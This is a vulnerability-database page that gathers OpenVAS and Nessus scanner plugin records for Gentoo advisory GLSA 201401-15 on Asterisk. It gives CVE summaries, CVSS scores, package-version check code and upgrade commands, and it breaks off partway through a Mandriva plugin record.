Gentoo Security Advisory GLSA 201401-15

2015-09-29T00:00:00

Description

Gentoo Linux Local Security Checks GLSA 201401-15

{"id": "OPENVAS:1361412562310121112", "type": "openvas", "bulletinFamily": "scanner", "title": "Gentoo Security Advisory GLSA 201401-15", "description": "Gentoo Linux Local Security Checks GLSA 201401-15", "published": "2015-09-29T00:00:00", "modified": "2018-10-26T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121112", "reporter": "Eero Volotinen", "references": ["https://security.gentoo.org/glsa/201401-15"], "cvelist": ["CVE-2013-5641", "CVE-2013-2264", "CVE-2013-2685", "CVE-2013-5642", "CVE-2012-5976", "CVE-2012-5977", "CVE-2013-7100", "CVE-2013-2686"], "lastseen": "2019-05-29T18:36:19", "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2013-029", "CPAI-2013-1661", "CPAI-2013-2961", "CPAI-2013-3492"]}, {"type": "cve", "idList": ["CVE-2012-5976", "CVE-2012-5977", "CVE-2013-2264", "CVE-2013-2685", "CVE-2013-2686", "CVE-2013-5641", "CVE-2013-5642", "CVE-2013-7100"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2605-1:42394", "DEBIAN:DSA-2605-2:4DD7B", "DEBIAN:DSA-2749-1:E342B", "DEBIAN:DSA-2835-1:D99AD"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2012-5976", "DEBIANCVE:CVE-2012-5977", "DEBIANCVE:CVE-2013-2264", "DEBIANCVE:CVE-2013-2685", "DEBIANCVE:CVE-2013-2686", "DEBIANCVE:CVE-2013-5641", "DEBIANCVE:CVE-2013-5642", "DEBIANCVE:CVE-2013-7100"]}, {"type": "fedora", "idList": ["FEDORA:0DA4021EBA", "FEDORA:307A42200F", "FEDORA:3C5CC215B2", "FEDORA:3F08C21512", "FEDORA:6763920EE9", "FEDORA:69DC620A83", "FEDORA:6D7AD209F1", "FEDORA:6E56421203", "FEDORA:A1E1F217E8", "FEDORA:ADB8421654"]}, {"type": "freebsd", "idList": ["0C39BAFC-6771-11E3-868F-0025905A4771", "DAF0A339-9850-11E2-879E-D43D7E0C7C02", "F7C87A8A-55D5-11E2-A255-C8600054B392", "FD2BF3B5-1001-11E3-BA94-0025905A4771"]}, {"type": "gentoo", "idList": ["GLSA-201401-15"]}, {"type": "mageia", "idList": ["MGASA-2013-0266", "MGASA-2013-0384", "MGASA-2014-0171"]}, {"type": "nessus", "idList": ["6690.PRM", "6750.PRM", "8006.PRM", "8007.PRM", "ASTERISK_AST_2012_015.NASL", "ASTERISK_AST_2013_001.NASL", "ASTERISK_AST_2013_002.NASL", "ASTERISK_AST_2013_003.NASL", "ASTERISK_AST_2013_004.NASL", "ASTERISK_AST_2013_005.NASL", "ASTERISK_AST_2013_007.NASL", "DEBIAN_DSA-2605.NASL", "DEBIAN_DSA-2749.NASL", "DEBIAN_DSA-2835.NASL", "FEDORA_2013-0992.NASL", "FEDORA_2013-0994.NASL", "FEDORA_2013-1003.NASL", "FEDORA_2013-15560.NASL", "FEDORA_2013-15567.NASL", "FEDORA_2013-24108.NASL", "FEDORA_2013-24119.NASL", "FEDORA_2013-24142.NASL", "FEDORA_2013-4528.NASL", "FEDORA_2013-4566.NASL", "FREEBSD_PKG_0C39BAFC677111E3868F0025905A4771.NASL", "FREEBSD_PKG_DAF0A339985011E2879ED43D7E0C7C02.NASL", "FREEBSD_PKG_F7C87A8A55D511E2A255C8600054B392.NASL", "FREEBSD_PKG_FD2BF3B5100111E3BA940025905A4771.NASL", "GENTOO_GLSA-201401-15.NASL", "MANDRIVA_MDVSA-2013-140.NASL", "MANDRIVA_MDVSA-2013-223.NASL", "MANDRIVA_MDVSA-2013-300.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310702835", "OPENVAS:1361412562310802063", "OPENVAS:1361412562310865254", "OPENVAS:1361412562310865264", "OPENVAS:1361412562310865273", "OPENVAS:1361412562310865535", "OPENVAS:1361412562310865538", "OPENVAS:1361412562310866888", "OPENVAS:1361412562310866890", "OPENVAS:1361412562310867223", "OPENVAS:1361412562310867224", "OPENVAS:1361412562310867306", "OPENVAS:1361412562310892605", "OPENVAS:1361412562310892749", "OPENVAS:702835", "OPENVAS:865254", "OPENVAS:865264", "OPENVAS:865273", "OPENVAS:865535", "OPENVAS:865538", "OPENVAS:866888", "OPENVAS:866890", "OPENVAS:867223", "OPENVAS:867224", "OPENVAS:867306", "OPENVAS:892605", "OPENVAS:892749"]}, {"type": "osv", "idList": ["OSV:DSA-2605-1", "OSV:DSA-2749-1", "OSV:DSA-2835-1"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28927", "SECURITYVULNS:DOC:28928", "SECURITYVULNS:DOC:29220", "SECURITYVULNS:DOC:29221", "SECURITYVULNS:DOC:29222", "SECURITYVULNS:VULN:12811", "SECURITYVULNS:VULN:12974"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2012-5976", "UB:CVE-2012-5977", "UB:CVE-2013-2264", "UB:CVE-2013-2685", "UB:CVE-2013-2686", "UB:CVE-2013-5641", "UB:CVE-2013-5642", "UB:CVE-2013-7100"]}]}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2013-3492"]}, {"type": "cve", "idList": ["CVE-2012-5976", "CVE-2012-5977"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2605-2:4DD7B"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2013-5642"]}, {"type": "fedora", "idList": ["FEDORA:6D7AD209F1", "FEDORA:6E56421203"]}, {"type": "freebsd", "idList": ["0C39BAFC-6771-11E3-868F-0025905A4771", "DAF0A339-9850-11E2-879E-D43D7E0C7C02", "F7C87A8A-55D5-11E2-A255-C8600054B392", "FD2BF3B5-1001-11E3-BA94-0025905A4771"]}, {"type": "nessus", "idList": ["6690.PRM", "ASTERISK_AST_2013_003.NASL", "ASTERISK_AST_2013_005.NASL", "FEDORA_2013-1003.NASL", "FEDORA_2013-4566.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310866890", "OPENVAS:892749"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29220", "SECURITYVULNS:DOC:29221"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2013-5642", "UB:CVE-2013-7100"]}]}, "exploitation": null, "vulnersScore": 0.1}, "pluginID": "1361412562310121112", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201401-15.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121112\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:26:35 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201401-15\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Asterisk. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201401-15\");\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\", \"CVE-2013-2264\", \"CVE-2013-2685\", \"CVE-2013-2686\", \"CVE-2013-5641\", \"CVE-2013-5642\", \"CVE-2013-7100\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201401-15\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"net-misc/asterisk\", unaffected: make_list(\"ge 11.7.0\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"net-misc/asterisk\", unaffected: make_list(\"ge 1.8.25.0\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"net-misc/asterisk\", unaffected: make_list(), vulnerable: make_list(\"lt 11.7.0\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "naslFamily": "Gentoo Local Security Checks", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660004461, "score": 1659976568}, "_internal": {"score_hash": "1b7a417854e0d7cda143e97261ae53be"}}

{"gentoo": [{"lastseen": "2022-01-17T19:09:28", "description": "### Background\n\nAsterisk is an open source telephony engine and toolkit.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Asterisk. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could execute arbitrary code with the privileges of the process, cause a Denial of Service condition, or obtain sensitive information. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Asterisk 11.* users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/asterisk-11.7.0\"\n \n\nAll Asterisk 1.8.* users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/asterisk-1.8.25.0\"", "cvss3": {}, "published": "2014-01-21T00:00:00", "type": "gentoo", "title": "Asterisk: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977", "CVE-2013-2264", "CVE-2013-2685", "CVE-2013-2686", "CVE-2013-5641", "CVE-2013-5642", "CVE-2013-7100"], "modified": "2014-01-21T00:00:00", "id": "GLSA-201401-15", "href": "https://security.gentoo.org/glsa/201401-15", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-18T14:26:54", "description": "The remote host is affected by the vulnerability described in GLSA-201401-15 (Asterisk: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Asterisk. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could execute arbitrary code with the privileges of the process, cause a Denial of Service condition, or obtain sensitive information.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2014-01-21T00:00:00", "type": "nessus", "title": "GLSA-201401-15 : Asterisk: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977", "CVE-2013-2264", "CVE-2013-2685", "CVE-2013-2686", "CVE-2013-5641", "CVE-2013-5642", "CVE-2013-7100"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:asterisk", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201401-15.NASL", "href": "https://www.tenable.com/plugins/nessus/72054", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201401-15.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72054);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\", \"CVE-2013-2264\", \"CVE-2013-2685\", \"CVE-2013-2686\", \"CVE-2013-5641\", \"CVE-2013-5642\", \"CVE-2013-7100\");\n script_xref(name:\"GLSA\", value:\"201401-15\");\n\n script_name(english:\"GLSA-201401-15 : Asterisk: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201401-15\n(Asterisk: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Asterisk. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could execute arbitrary code with the privileges of\n the process, cause a Denial of Service condition, or obtain sensitive\n information.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201401-15\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Asterisk 11.* users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/asterisk-11.7.0'\n All Asterisk 1.8.* users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/asterisk-1.8.25.0'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/asterisk\", unaffected:make_list(\"ge 11.7.0\", \"rge 1.8.25.0\"), vulnerable:make_list(\"lt 11.7.0\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Asterisk\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-12T15:56:44", "description": "Multiple vulnerablilities was identified and fixed in asterisk :\n\nThe SIP channel driver in Asterisk Open Source 1.8.x before 1.8.20.2, 10.x before 10.12.2, and 11.x before 11.2.2; Certified Asterisk 1.8.15 before 1.8.15-cert2; Asterisk Business Edition (BE) C.3.x before C.3.8.1; and Asterisk Digiumphones 10.x-digiumphones before 10.12.2-digiumphones exhibits different behavior for invalid INVITE, SUBSCRIBE, and REGISTER transactions depending on whether the user account exists, which allows remote attackers to enumerate account names by (1) reading HTTP status codes, (2) reading additional text in a 403 (aka Forbidden) response, or (3) observing whether certain retransmissions occur (CVE-2013-2264).\n\nStack-based buffer overflow in res/res_format_attr_h264.c in Asterisk Open Source 11.x before 11.2.2 allows remote attackers to execute arbitrary code via a long sprop-parameter-sets H.264 media attribute in a SIP Session Description Protocol (SDP) header (CVE-2013-2685).\n\nmain/http.c in the HTTP server in Asterisk Open Source 1.8.x before 1.8.20.2, 10.x before 10.12.2, and 11.x before 11.2.2; Certified Asterisk 1.8.15 before 1.8.15-cert2; and Asterisk Digiumphones 10.x-digiumphones before 10.12.2-digiumphones does not properly restrict Content-Length values, which allows remote attackers to conduct stack-consumption attacks and cause a denial of service (daemon crash) via a crafted HTTP POST request. NOTE: this vulnerability exists because of an incorrect fix for CVE-2012-5976 (CVE-2013-2686).\n\nThe updated packages have upgraded to the 11.2.2 version which is not vulnerable to these issues", "cvss3": {}, "published": "2013-04-20T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : asterisk (MDVSA-2013:140)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2013-2264", "CVE-2013-2685", "CVE-2013-2686"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:asterisk", "p-cpe:/a:mandriva:linux:asterisk-addons", "p-cpe:/a:mandriva:linux:asterisk-devel", "p-cpe:/a:mandriva:linux:asterisk-firmware", "p-cpe:/a:mandriva:linux:asterisk-plugins-alsa", "p-cpe:/a:mandriva:linux:asterisk-plugins-calendar", "p-cpe:/a:mandriva:linux:asterisk-plugins-cel", "p-cpe:/a:mandriva:linux:asterisk-plugins-corosync", "p-cpe:/a:mandriva:linux:asterisk-plugins-curl", "p-cpe:/a:mandriva:linux:asterisk-plugins-dahdi", "p-cpe:/a:mandriva:linux:asterisk-plugins-fax", "p-cpe:/a:mandriva:linux:asterisk-plugins-festival", "p-cpe:/a:mandriva:linux:asterisk-plugins-ices", "p-cpe:/a:mandriva:linux:asterisk-plugins-jabber", "p-cpe:/a:mandriva:linux:asterisk-plugins-jack", "p-cpe:/a:mandriva:linux:asterisk-plugins-ldap", "p-cpe:/a:mandriva:linux:asterisk-plugins-lua", "p-cpe:/a:mandriva:linux:asterisk-plugins-minivm", "p-cpe:/a:mandriva:linux:asterisk-plugins-mobile", "p-cpe:/a:mandriva:linux:asterisk-plugins-mp3", "p-cpe:/a:mandriva:linux:asterisk-plugins-mysql", "p-cpe:/a:mandriva:linux:asterisk-plugins-ooh323", "p-cpe:/a:mandriva:linux:asterisk-plugins-osp", "p-cpe:/a:mandriva:linux:asterisk-plugins-oss", "p-cpe:/a:mandriva:linux:asterisk-plugins-pgsql", "p-cpe:/a:mandriva:linux:asterisk-plugins-pktccops", "p-cpe:/a:mandriva:linux:asterisk-plugins-portaudio", "p-cpe:/a:mandriva:linux:asterisk-plugins-radius", "p-cpe:/a:mandriva:linux:asterisk-plugins-saycountpl", "p-cpe:/a:mandriva:linux:asterisk-plugins-skinny", "p-cpe:/a:mandriva:linux:asterisk-plugins-snmp", "p-cpe:/a:mandriva:linux:asterisk-plugins-speex", "p-cpe:/a:mandriva:linux:asterisk-plugins-sqlite", "p-cpe:/a:mandriva:linux:asterisk-plugins-tds", "p-cpe:/a:mandriva:linux:asterisk-plugins-unistim", "p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail", "p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-imap", "p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-plain", "p-cpe:/a:mandriva:linux:lib64asteriskssl1", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2013-140.NASL", "href": "https://www.tenable.com/plugins/nessus/66152", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:140. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66152);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-2264\", \"CVE-2013-2685\", \"CVE-2013-2686\");\n script_bugtraq_id(58756, 58760, 58764);\n script_xref(name:\"MDVSA\", value:\"2013:140\");\n\n script_name(english:\"Mandriva Linux Security Advisory : asterisk (MDVSA-2013:140)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerablilities was identified and fixed in asterisk :\n\nThe SIP channel driver in Asterisk Open Source 1.8.x before 1.8.20.2,\n10.x before 10.12.2, and 11.x before 11.2.2; Certified Asterisk 1.8.15\nbefore 1.8.15-cert2; Asterisk Business Edition (BE) C.3.x before\nC.3.8.1; and Asterisk Digiumphones 10.x-digiumphones before\n10.12.2-digiumphones exhibits different behavior for invalid INVITE,\nSUBSCRIBE, and REGISTER transactions depending on whether the user\naccount exists, which allows remote attackers to enumerate account\nnames by (1) reading HTTP status codes, (2) reading additional text in\na 403 (aka Forbidden) response, or (3) observing whether certain\nretransmissions occur (CVE-2013-2264).\n\nStack-based buffer overflow in res/res_format_attr_h264.c in Asterisk\nOpen Source 11.x before 11.2.2 allows remote attackers to execute\narbitrary code via a long sprop-parameter-sets H.264 media attribute\nin a SIP Session Description Protocol (SDP) header (CVE-2013-2685).\n\nmain/http.c in the HTTP server in Asterisk Open Source 1.8.x before\n1.8.20.2, 10.x before 10.12.2, and 11.x before 11.2.2; Certified\nAsterisk 1.8.15 before 1.8.15-cert2; and Asterisk Digiumphones\n10.x-digiumphones before 10.12.2-digiumphones does not properly\nrestrict Content-Length values, which allows remote attackers to\nconduct stack-consumption attacks and cause a denial of service\n(daemon crash) via a crafted HTTP POST request. NOTE: this\nvulnerability exists because of an incorrect fix for CVE-2012-5976\n(CVE-2013-2686).\n\nThe updated packages have upgraded to the 11.2.2 version which is not\nvulnerable to these issues\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-addons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-cel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-corosync\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-dahdi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-fax\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-festival\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-ices\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-jabber\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-jack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-lua\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-minivm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-mobile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-mp3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-ooh323\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-osp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-oss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-pktccops\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-portaudio\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-radius\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-saycountpl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-skinny\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-speex\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-tds\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-unistim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-plain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64asteriskssl1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n 